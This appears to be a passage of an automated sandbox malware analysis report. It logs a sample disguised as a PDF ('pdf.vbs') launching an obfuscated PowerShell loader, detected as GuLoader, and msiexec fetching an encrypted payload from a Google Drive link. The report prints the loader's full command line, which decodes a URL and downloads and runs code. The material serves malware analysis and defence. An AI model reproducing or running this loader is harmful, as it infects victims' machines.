                  2024-10-01 05:46:28 UTC216OUTGET /uc?export=download&id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: drive.google.com
                  Cache-Control: no-cache
                  2024-10-01 05:46:28 UTC1610INHTTP/1.1 303 See Other
                  Content-Type: application/binary
                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                  Pragma: no-cache
                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                  Date: Tue, 01 Oct 2024 05:46:28 GMT
                  Location: https://drive.usercontent.google.com/download?id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd&export=download
                  Strict-Transport-Security: max-age=31536000
                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                  Cross-Origin-Opener-Policy: same-origin
                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                  Content-Security-Policy: script-src 'nonce-2tk-tAvfavLzjcj15EwVxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                  Server: ESF
                  Content-Length: 0
                  X-XSS-Protection: 0
                  X-Frame-Options: SAMEORIGIN
                  X-Content-Type-Options: nosniff
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.849709142.250.184.1934433136C:\Windows\SysWOW64\msiexec.exe
                  TimestampBytes transferredDirectionData
                  2024-10-01 05:46:29 UTC258OUTGET /download?id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd&export=download HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Cache-Control: no-cache
                  Host: drive.usercontent.google.com
                  Connection: Keep-Alive
                  2024-10-01 05:46:32 UTC4860INHTTP/1.1 200 OK
                  Content-Type: application/octet-stream
                  Content-Security-Policy: sandbox
                  Content-Security-Policy: default-src 'none'
                  Content-Security-Policy: frame-ancestors 'none'
                  X-Content-Security-Policy: sandbox
                  Cross-Origin-Opener-Policy: same-origin
                  Cross-Origin-Embedder-Policy: require-corp
                  Cross-Origin-Resource-Policy: same-site
                  X-Content-Type-Options: nosniff
                  Content-Disposition: attachment; filename="CONrJpEPIFtKwb90.bin"
                  Access-Control-Allow-Origin: *
                  Access-Control-Allow-Credentials: false
                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                  Accept-Ranges: bytes
                  Content-Length: 494656
                  Last-Modified: Mon, 30 Sep 2024 09:08:59 GMT
                  X-GUploader-UploadID: AD-8ljvYGCBQq_TsSb5Ds1UaQhN1RDNnTkX7Q-UhxS40TF3ME6l-pJx9EDWSjcDNYQCUEvMojyMrZAKhOw
                  Date: Tue, 01 Oct 2024 05:46:32 GMT
                  Expires: Tue, 01 Oct 2024 05:46:32 GMT
                  Cache-Control: private, max-age=0
                  X-Goog-Hash: crc32c=9RQZ4w==
                  Server: UploadServer
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close
                  2024-10-01 05:46:32 UTC4860INData Raw: f8 2e 46 05 95 61 eb e9 3a bc a7 01 91 1c fb 6f df 45 81 0c e3 78 c5 33 59 98 ef b6 9e 61 3e eb 5a fc 0a b5 82 05 48 ae 5c 87 cf 98 d4 cd 2a 23 e0 49 8f ac 87 62 01 0e 84 44 6c 65 4f 11 49 60 84 1b ab 86 fb d8 26 0c eb 51 84 5c 21 58 20 4d 1a d8 3b 3c ce 8c 7b 7f 13 5a b1 b4 99 60 69 26 1a 1a 6b ec 3a ab ba 15 1c 5a 79 f1 eb 7a 10 25 ca 35 9a 6b dd 56 3b 51 d8 8b 42 11 f4 d1 41 33 1e 7b 30 ed fa 02 5c 5f 94 8b a7 03 f4 91 93 10 a0 2b f0 a6 bb 3c 68 9c 2f 39 fc e5 b0 1e b2 97 38 b8 51 e4 60 d3 63 bd 6f be 1d 12 fb ef 65 27 09 f1 72 36 b8 22 a3 8d 12 08 e9 74 2c 74 0e ef b8 95 42 2c 2d 95 fe b3 9b 7a aa 26 3b 6c 28 6a 36 05 47 a5 dc 78 0e 40 84 87 14 d0 7c e1 88 01 00 1e 2b 7d 5f 71 3f fa 8c bb 07 d2 b3 1e f9 2b e2 b0 79 8e 1c 53 48 81 00 28 f3 3b 17 17 66
                  Data Ascii: .Fa:oEx3Ya>ZH\*#IbDleOI`&Q\!X M;<{Z`i&k:Zyz%5kV;QBA3{0\_+<h/98Q`coe'r6"t,tB,-z&;l(j6Gx@|+}_q?+ySH(;f
                  2024-10-01 05:46:32 UTC4860INData Raw: ae 93 b2 5a 38 0f c9 64 c7 fa b7 89 1d 75 b4 86 0a cb 2d eb 14 11 2b 5a 3f 64 7d b0 39 aa 70 e6 2d 8d 8c 82 7b f2 e0 7f 70 e0 79 ab 56 f5 2a 13 80 27 eb 73 28 67 11 1e 10 8b 1f b9 78 6b 98 3f 59 49 8d 44 d9 f1 65 92 9b bb d8 c2 cb 94 6c 85 2e 6b d7 62 55 05 48 3b 65 f8 d1 b1 ab 9d d0 6f a2 dd a7 5e f6 2b e8 fc 47 5d c6 ae c6 3d 93 c9 bc f0 67 29 57 2c 77 60 9f 5f 61 88 f9 b8 5b 31 8b 5d d6 21 d4 33 42 56 2e 5b 67 5a 5b 5b 2b b4 83 bc a5 9e 0d 2f bd c2 d2 24 df 33 13 1b 2c 93 8e 0e 77 cf 09 87 99 db ae 5f 16 1a f8 0b 1d 1f 8f 57 81 d4 2d 17 0c 10 93 7a 01 fe f8 99 44 a3 40 fe a2 fb 13 74 49 ed 86 a8 a1 f3 30 07 25 b3 c5 54 28 c2 7d 87 56 c0 fe 18 1c 61 fc f2 27 ee b7 a9 15 6f 98 0b 3b 8a b1 a8 eb 10 08 ff 54 47 ca da 7d 8b 35 8a 05 b5 f2 9b ca cf 78 db 7f
                  Data Ascii: Z8du-+Z?d}9p-{pyV*'s(gxk?YIDel.kbUH;eo^+G]=g)W,w`_a[1]!3BV.[gZ[[+/$3,w_W-zD@tI0%T(}Va'o;TG}5x
                  2024-10-01 05:46:32 UTC121INData Raw: 19 d4 6e 1b 71 dc f8 1c 13 fd 69 c1 5b e9 2c a4 e8 fe 77 af f0 bb 4a 70 76 d7 52 96 2f fe 0a 7b 18 01 c9 2d 74 0e bf 39 ab f2 51 e8 c2 24 25 4d 61 7c 58 23 fb bb e8 41 4d 30 33 89 93 27 c1 28 8c 7c a6 7b 72 5f 7f fc c8 84 cd e1 c3 e8 84 cd 52 93 f2 71 e1 72 97 24 0a 02 0f 3c 49 61 8b c1 7c 77 ac 82 0f b0 db 36 d0 cd a0 46 1a 5d 37 ca 4c 0e 0c 76 06 b8 19 80 c0
                  Data Ascii: nqi[,wJpvR/{-t9Q$%Ma|X#AM03'(|{r_Rqr$<Ia|w6F]7Lv
                  2024-10-01 05:46:32 UTC1390INData Raw: de 1a a5 28 a5 d1 b3 92 d6 e5 d5 de b5 f7 8f 8e aa bf a8 a0 72 74 c4 17 ef 68 77 f3 30 19 d4 b9 dc 4d 3f 7d a9 d7 89 64 d8 65 40 3a 87 af d5 f0 75 d3 1f c7 af b4 7c b5 fc 3a 01 6a e4 2c c3 fd 21 07 90 c3 8e 08 f1 1c 55 b5 53 13 34 ab ec 36 39 b9 80 2d 67 55 75 eb 00 23 9f 83 16 be 96 56 f8 fa e6 46 92 3b 59 34 80 4a e6 67 98 5d b5 91 ff 60 1c 56 33 c1 66 18 1d d3 43 e7 99 69 37 6b 45 13 29 25 a1 ba 78 12 43 d6 91 0a 5e 3e 4b d1 03 c3 7a 5a 6e f4 ae 53 1c 37 db 1a a2 14 9b 5c 9e cd 0e ef ad 91 a6 37 a5 af ce b3 77 40 7d e6 97 3d 3e ef 0b a9 ea 81 9a db 07 a4 80 4d 3a e6 47 ee be b8 d7 c5 ff f3 c2 c3 27 2c 2d b9 32 1c 64 8a 03 97 27 5e e6 ce 30 37 13 32 94 a3 2b e8 5c f3 15 d7 de b7 7b 28 79 7d 56 ca 79 dc f8 26 50 42 f5 94 fa 5d 0b 73 4f 48 a7 62 e4 09 2a
                  Data Ascii: (rthw0M?}de@:u|:j,!US469-gUu#VF;Y4Jg]`V3fCi7kE)%xC^>KzZnS7\7w@}=>M:G',-2d'^072+\{(y}Vy&PB]sOHb*
                  2024-10-01 05:46:32 UTC1390INData Raw: f5 10 94 77 73 3b 67 85 05 b0 d0 f4 ae f0 bb b4 50 ef ea ba 8c 3a 6c ac bf e0 c6 f6 dd 28 9d ec 8c cf d9 8b a9 8c a8 e8 c5 91 9e 47 a5 12 80 f3 24 75 7f 64 8a b9 7d b0 e5 c4 9c 92 d4 d9 82 65 67 f3 44 0c 30 98 3f 66 c2 ab 0f 51 02 9a a1 f6 5a af 8f f0 05 1f c7 d0 f7 b3 41 de cb 63 2b 04 eb 7f e1 64 e4 c0 b3 e7 27 5b f5 6a 46 68 03 d2 5f 6a ad d9 3e 50 12 9f 13 58 d4 a8 af e3 e7 03 48 cc ae d9 33 c5 31 94 a6 29 de 8e 2e e2 8a 0a 94 ef 0a e1 ac 23 bb df df 13 c8 e5 35 c7 cd a6 b0 d9 b0 b2 15 9f f7 9d 0e fc fe d7 59 a6 db 61 7b b7 5c af 61 43 7f 71 ec 45 04 c3 e8 87 15 e7 e9 45 5a 66 8e 17 4b d5 c9 02 5f 67 e5 30 33 09 e4 d3 60 92 07 e4 40 3a ab c9 0c 9c 7f 35 b2 ff 5e e1 e8 b8 5d f9 3b 64 48 df 67 3d 14 fc 6d 91 27 eb 10 ca ae d9 82 66 5d 82 ff 25 1f 6f e0
                  Data Ascii: ws;gP:l(G$ud}egD0?fQZAc+d'[jFh_j>PXH31).#5Ya{\aCqEEZfK_g03`@:5^];dHg=m'f]%o
                  2024-10-01 05:46:32 UTC1390INData Raw: 99 c6 97 b7 b6 93 01 1f 4f 09 53 3b 30 1a 67 10 9a d8 27 b9 ae 22 79 9a c5 58 30 8e d8 59 60 eb 54 0c da 36 d4 26 24 d5 4a 61 e0 35 24 5a 22 c0 3a f7 e4 8c 63 15 3b 9a 43 88 e2 81 03 61 ae 58 73 b5 45 18 02 51 c5 ae bb a4 b0 0b af 01 09 d4 71 9a 18 cd 57 d5 b5 68 a2 27 d2 a2 f0 91 ea f8 2c 85 c3 2c fc 88 35 77 83 c1 98 28 56 b2 01 fd 4e c3 1f 2e e7 dc 39 6c dc 62 4a a7 eb a3 b9 4d 9a e5 0b cb 09 77 21 bd 9a ce 09 30 fd 88 1f d4 df 56 25 cc eb ef e4 7e fd cb 82 3e 7b 9d 68 87 c9 c1 03 69 7e af 48 75 9d 64 72 9b ba a2 d6 26 5a 00 a9 a2 d9 b8 7e b0 68 fe 2f 01 4f 24 d1 af fa 0e d6 6d 40 98 29 c5 ca f5 79 8c fc 02 e4 96 ba 7b a3 81 2c e6 13 ff 83 f9 28 ce 07 b5 97 e7 b0 4e 4b 55 d8 0c 58 5f 1a 83 41 06 ae ba 96 f0 4a 2a a7 bc f3 75 d5 41 c4 13 1e 31 3c 39 0e
                  Data Ascii: OS;0g'"yX0Y`T6&$Ja5$Z":c;CaXsEQqWh',,5w(VN.9lbJMw!0V%~>{hi~Hudr&Z~h/O$m@)y{,(NKUX_AJ*uA1<9
                  2024-10-01 05:46:32 UTC1390INData Raw: 4b 9b ea 8a 28 87 7f 25 ef 87 83 a7 f8 ae 75 da f1 f6 68 ae 92 ef dc 21 28 e9 77 ae 93 fb 09 15 fc 13 c1 eb ac 82 16 7b 26 e8 3f ac a9 ec 16 b0 cb f5 ec 30 22 6c 15 b2 ed 3f ce 34 9a f2 4f 50 3a 55 c9 8e e9 86 1c e0 be 42 b6 95 72 2b b8 bf 53 fb a6 b5 67 f0 83 b8 8b 6e 29 ba 00 da ef ac b8 b3 cc bf 01 2b 22 5c 24 c6 1a 80 ea d4 cb e6 d4 b9 dc 41 de b2 a9 d3 6f 9b 27 2c 82 64 ac 76 2a 59 d8 0e 65 67 af b4 7c ad fc d6 ee 95 1b f7 e3 0a e3 1c 90 65 8e 08 f1 1c 4e a4 53 13 d5 6d d8 f5 e4 88 1c c3 80 21 7b 9f be ef 83 84 eb bf e2 61 49 b1 89 77 85 f7 22 05 97 e9 cf c6 a5 d2 73 9c 6a 66 c1 f6 24 26 ad ef 69 a9 d7 d6 72 1d d0 db 5c 3a 51 6c 6b 52 fe 19 c8 0d a4 b9 db c0 61 02 ab b7 ed e2 8e 76 75 bc c9 7c 61 fa f5 9f 55 b4 44 f9 f9 10 a4 98 76 89 85 bf 10 c9 cc
                  Data Ascii: K(%uh!(w{&?0"l?4OP:UBr+Sgn)+"\$Ao',dv*Yeg|eNSm!{aIw"sjf$&ir\:QlkRavu|aUDv
                  2024-10-01 05:46:32 UTC1390INData Raw: a2 f4 9b 8f a8 eb 72 87 6d ca 62 39 1c 14 f6 00 32 6a 8c 4b 2c 89 49 da 1c 64 a8 40 b6 ed 88 e1 8d 92 05 c0 f7 67 8f 79 5a 89 5d ce ea f8 b4 31 c7 15 17 df fd 27 ef eb 96 ed 18 80 90 c7 a6 11 ca 3a 3f 83 34 f5 17 5c 43 e2 c9 49 01 14 f6 ec 38 68 73 b4 94 f3 b3 65 a6 9c 02 67 57 71 52 e1 23 c7 1b b9 0b 75 9b c4 82 ac 55 57 97 38 13 a2 1c b8 e7 b5 cc 00 b4 2f 89 c1 41 c1 45 d6 2a 87 7e 21 b1 f1 ba 54 27 ef 96 1a a3 b7 9b 92 3f 5c d1 5e 1e fe fd 79 e2 bc 73 ba 07 35 6e e5 9a ec 10 02 13 95 ae 34 eb 98 7d 6a 83 1e 27 3d b5 8a a8 e8 15 de 21 75 4b 34 bb cd dc 1d 49 12 70 82 fc a0 58 0a d9 ad 3f 91 42 77 e7 93 57 c3 69 27 1c 88 ad 78 74 39 1a b0 f3 cf 4c 5d c4 d0 a9 93 1d b6 dd ed fd 59 53 23 93 cf 07 8a 62 7d 3f bd cb a6 9f 4a 89 98 4f 3b 20 3d 9a 32 30 ba cc
                  Data Ascii: rmb92jK,Id@gyZ]1':?4\CI8hsegWqR#uUW8/AE*~!T'?\^ys5n4}j'=!uK4IpX?BwWi'xt9L]YS#b}?JO; =20
                  2024-10-01 05:46:32 UTC1390INData Raw: d9 e2 78 e8 95 f3 8d 8a 90 4a 79 cb fa 4e d4 cc 4d bb 68 9a 8b 10 38 3b 63 4c 36 09 19 94 33 5c f4 22 d5 3f 49 c6 f2 c5 59 52 e6 8a 15 f2 4b a7 68 18 1f 60 7f af ad 98 24 3a 14 14 8b 78 97 9d eb 51 e0 60 5c 75 fc 09 be b8 89 25 e4 cd 0e 21 bd ba 4f 44 80 7a 60 ac ae 4c d8 5a 6f 7e 3c 80 fb ef ec 1d c7 86 e5 bc 7a 24 27 c9 eb 2d 61 23 60 01 47 13 9b 19 85 18 50 6d 19 a9 a7 25 bf fa dd c0 4f 14 90 57 64 43 2e 72 d4 93 48 f3 44 82 95 10 ec 0d 7e 72 0e 51 b9 3a 3c e0 96 b2 96 16 12 a6 c2 35 64 01 a4 07 89 bc e4 eb f2 87 cf 81 eb 82 13 5d 6d a6 17 f2 1c 8a 38 1a 31 ef bc fa 01 87 7b c3 1f 72 7e d1 8a 71 c0 a5 77 28 2f fe 61 d6 ee bc d7 4d a4 c7 93 15 ee 3c a4 44 cc fd b2 7b e2 71 bf 37 eb 99 34 82 48 f3 95 51 53 f0 d2 04 f2 bb e0 58 94 df ff 28 75 01 17 64 45
                  Data Ascii: xJyNMh8;cL63\"?IYRKh`$:xQ`\u%!ODz`LZo~<z$'-a#`GPm%OWdC.rHD~rQ:<5d]m81{r~qw(/aM<D{q74HQSX(udE
                  2024-10-01 05:46:32 UTC1390INData Raw: c6 da 35 b1 5a 1f fd 05 6c da 16 63 33 de 13 2f ca 7f 34 78 89 e2 aa 5e 64 51 4a cc 25 8b 35 3b 09 2d 21 35 06 29 36 0e 84 28 15 0b 82 44 d9 70 57 36 a4 30 e6 7e bf 6d 40 81 c4 26 22 b9 f3 84 26 ef 30 9e 16 53 1d e7 46 bc e2 f7 16 24 a7 ba e6 d4 79 11 05 8a a3 d1 eb 9e 85 37 f7 a2 f8 af 16 a1 07 7c 9f 8c 6f ac 1a c1 87 58 ba e2 b7 eb d5 8f 14 d8 de fc f6 68 19 0f 06 8f bd f6 25 fb d0 02 bf c1 80 df 56 49 9e 00 91 48 36 cf 8e e5 ad 3b 0b 27 92 a8 32 ad 22 fc 17 42 92 59 99 72 b6 a8 43 fd 55 c1 f0 f3 94 4d 4a 81 87 6e 45 f4 b8 f7 e5 71 9e 7d 5f d4 bf 15 d2 b2 14 3e 20 ba 48 3d 3b 46 09 1e bd 63 94 4d 75 ef 16 23 84 4e 79 8d 5e 2b 9e 6d 33 f8 db 07 73 45 43 c9 bf 1e d5 94 8e 06 20 07 84 ef 8d e9 3f 1c d4 9f 53 13 d5 65 6e b7 7c 88 97 6c d4 8e 92 9d 30 23 83
                  Data Ascii: 5Zlc3/4x^dQJ%5;-!5)6(DpW60~m@&"&0SF$y7|oXh%VIH6;'2"BYrCUMJnEq}_> H=;FcMu#Ny^+m3sEC ?Sen|l0#


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:01:45:45
                  Start date:01/10/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs"
                  Imagebase:0x7ff69d450000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:2
                  Start time:01:45:47
                  Start date:01/10/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio Fritl PrecTBill ySkr.bpLdreceNavne] rodu: Prpa:Cos.uTPecullBecrisCorre1Pikan2M cac ');$Exaltations=$Seriately[0];$Nongratifying=(Omhng120 'Songo$ AlumgM slyl RidsOStedmBRadioADel.nLOutpe:d skod O diy CaddeChampmMy coawindskPortaiSh ngN ccengSquad=ContaNPal ee BoerwGa,le- askOEtrusbP ppaJ postepursuCOran TBirac Arla sDrayiyt mposNonexTBo igeDruckmDiaki. BetinSlyngeVu.tuTRin e.VakuuwGanjaEOligabTils,cPirusLIntuiiDumdretrichnSkylltEndos ');Stungen ($Nongratifying);Stungen (Omhng120 'Donkr$ Int DPos ty MisteAncismTac.ya CounkFremeiSoftnnSubskgtwa d. iltrHCollieP steaUno edNa.opeumba ranodesRmega[Misto$SarifOMultidGlo,se RondlColomeCharat Medb]Front= List$ .aktATaktat OvertStra.r KlipiGlaurbPiratuOvonit stanvinde r CruodSpot iT.teleHous,rBeta nutense Reag ');$indledningers=Omhng120 'Inter$ .urpD L,ddyUnde eUncoummisdoaPer ek stofi.ebninjesuigG mcr. AlviD umfooDecenw ndsntevanlModneoMa agaKolbedSoldeF HeliiUn.nel Imdee riv( Kont$LektuEMavesx BinaaSkak.lXyloftInteraInjektTv reiMandjoFlippn Forms orag, gi t$SrklaMKrakee c epgBlamaaUnstar IjmaaInsti)psyko ';$Megara=$Istandsttende;Stungen (Omhng120 'Ndtrf$ ouquG tooll rikiOAlmacBOpfriaToothlProd :GefilD Inteo BesiNTyphousoci tBitniSLaman= njoi(gmelitResurEBaandsFlas,t Ildr-otozop AddraB,styt omfrHPeasa Chaws$TrnermBl baEBrideGBeroeaBlyglrAfsteABland)Omfo, ');while (!$Donuts) {Stungen (Omhng120 'Delef$JentrgRiflilKem koColosbUnsu a Schel exah:HvlviDBec siFrontdP ecrySesqunListeaUdfldmSucrai GaveaThion=Udrad$.utoltOmbytrfrogfu.lleseW,yme ') ;Stungen $indledningers;Stungen (Omhng120 'StiffSPreobtColosaLaeotrS tratChiff- UdasSVouchlJews eSepale opplpBinds Abote4Leads ');Stungen (Omhng120 'Hastv$T.ikogOve flL veroJ,nglbDeadwa selelOmgng:Asse DHvneroStemnnMang,uOwnsutLakfasPri,r= U ex(bo igT PacheCiff sOv.rptOldeb-Pa,esP ChiaaUl entU sanhUse e To on$ UnguM VermeGenkog BlodaF,dlar adioaRasor)Obers ') ;Stungen (Omhng120 'Overs$Utakng AllelCl,sso Bu,nbForlaa VedllForha:RevirT ,ouraNonsem Ro deHayag= Med $Telefg WiltlmoutooHetaebel,owaIndf,lmonos: EnerFHandsiSiks lPretrmLun rsDromot summr Derbi EctomPoli mPhotoeOve,nlHuers+Acina+Disbe%Under$,andsS ungeeUnb arReseriAccu.a Gen tunhare fblalSlummyAnt.r.LaramcSmallo SkyduAfskrnSybiltMaves ') ;$Exaltations=$Seriately[$Tame];}$Eksekverbare=282308;$trikstank=31667;Stungen (Omhng120 'C rom$ motigCirculTagryoMiliebForloaG.bbel S pr:NonemJBlacku Eftel orudeAllerm BluneForbis puppsNoveme LrernidiomsWab,t Repe=Akupu .aatGAdelseAandftGen r- maniCInsinoGrnsen EgentL,tbee reennFraflt ndel Unr p$.outiMro aieOpkalgGutsiaPilferKle oa She, ');Stungen (Omhng120 ' ore$Forsvgtmmerl Ens o CarbbPseudaRkkevlBev s:FormaEAspacxS ptopC rkelFriediFj rncFlyn aSunfibSvaeriLokall Nippi roustBlaahyTopsp rind=W shi Retor[ xureSNotoryTil.ys salvtContaeEmanumneote.KefsfCAu tlo.odifnHyn,sv Reole DamprL.gkatNumbb]Skatt:Proec:MetteFF dusrSkitsoChargmInterBBe liaStvnisforfeeCro.k6 egle4 itheSFrosttLatherAmpleiAblatnPrologPalae(Belam$ Au oJDe maustranlGoyineEndotmCommieSeggas ecisMali.e NectnAntics Akti)Besla ');Stungen (Omhng120 'Missu$SubvegfravrlTaksto portb Re saNinetlGalvv:Leg nTFlymehTrapioEnh dmCordiiBrugesD cklt Ac u Uddan=Confi Afpa[ MetaS Ect y Genes.ipsot harie rdomm Stev.Musk,TOmproeSek nx Othatindkr. SecaEAlv onEctrocOrigioErkyndBryoniSneadnVillig ,ntr]Soci :rgneh:StilmABrnepS ynonCP.laeISaracIBetj .SeersGUndereEnwrit pannS Umrktbassar trici otanGamb g over( Coxe$DrapeE Se uxN,nmapCranilFerdyiSleigcKamgaaAdaptb Gappi.aabul Tek iFolket DiacyDisco) Farv ');Stungen (Omhng120 'Samme$CircugTasselVens.oRhi ebS elnaBothilThaum:HvidkoHoggepMolalsMet gt BesktO teaeIndbanGonord StateDem t=Downv$DisemTNaturhUn raoBagr.mPersoiSprkfs Blegt M zz.Hove.sDe,umuanstrbEmbiosJydettOptakrT staiBeslanRsonngP haw( .iva$TanisE R.mpkLymphsHu hjedaakakD shevVrvleeHeracrSubcob So aa A derSamleeParti, apot$Laze.tM diarShoppi Foolk fluisForgat ver aUndernportskD,tal)Echiu ');Stungen $opsttende;"
                  Imagebase:0x7ff6cb6b0000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1610119241.0000029190071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:3
                  Start time:01:45:47
                  Start date:01/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6ee680000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

